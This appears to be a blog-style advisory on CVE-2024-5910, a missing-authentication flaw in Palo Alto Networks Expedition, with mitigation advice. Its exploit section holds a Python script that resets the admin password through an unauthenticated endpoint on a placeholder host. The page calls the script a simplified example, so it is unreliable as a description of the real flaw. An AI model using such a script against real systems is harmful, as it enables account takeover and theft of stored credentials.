Exploiting Missing Authentication in Palo Alto Networks Expedition

CVE-2024-5910, 10 Nov 2024

CVE-2024-5910 is a critical vulnerability in the Palo Alto Networks Expedition tool, which is used for firewall configuration migration and management. This vulnerability arises from missing authentication for a critical function, allowing an attacker with network access to take over an Expedition admin account. Once exploited, attackers can gain access to sensitive configuration secrets, credentials, and other data stored within the tool.

Exploit Details

The vulnerability can be exploited by sending a specially crafted request to an exposed endpoint, which resets the admin password. Here’s a simplified example of how the exploit might work:

  1. Identify the Vulnerable Endpoint: The attacker identifies an exposed endpoint in the Expedition tool that lacks proper authentication.

  2. Craft the Exploit Request: The attacker crafts a request to reset the admin password. This can be done using a simple HTTP request.

python

import requests

# URL of the vulnerable endpoint
url = "http://<target-expedition-server>/reset_admin_password"

# Crafting the exploit payload
payload = {
    "new_password": "NewSecurePassword123!"
}

# Sending the exploit request
response = requests.post(url, data=payload)

# Checking the response
if response.status_code == 200:
    print("Admin password reset successfully!")
else:
    print("Failed to reset admin password.")

  1. Execute the Exploit: The attacker sends the crafted request to the vulnerable endpoint. If successful, the admin password is reset to a new value controlled by the attacker.

  2. Gain Access: With the new admin password, the attacker can log in to the Expedition tool and access sensitive data, including configuration secrets and credentials.

Mitigation

To mitigate this vulnerability, it is essential to:

  1. Update Expedition: Upgrade to Expedition version 1.2.92 or later, where the vulnerability has been fixed.

  2. Restrict Network Access: Ensure that network access to the Expedition installation is restricted to authorized users, hosts, or networks.

  3. Monitor for Indicators of Compromise: Regularly check for any signs of exploitation and take immediate action if any are found.

For more detailed guidance and updates, you can refer to the CISA advisory and other security advisories.

You can find the proof-of-concept (PoC) exploit for CVE-2024-5910 on GitHub. Here is the link to the repository:

CVE-2024-5910 PoC on GitHub

Warning: All information on this page is provided solely for understanding the CVE-2024-5910 vulnerability and applying the patch as soon as possible. Unauthorized use of this information for any other purpose is strictly prohibited. Failure to apply the patch immediately may result in severe security risks, including unauthorized access and data theft.

For applying the patch for CVE-2024-5910, you can refer to the following link:

https://security.paloaltonetworks.com/CVE-2024-5910

Last updated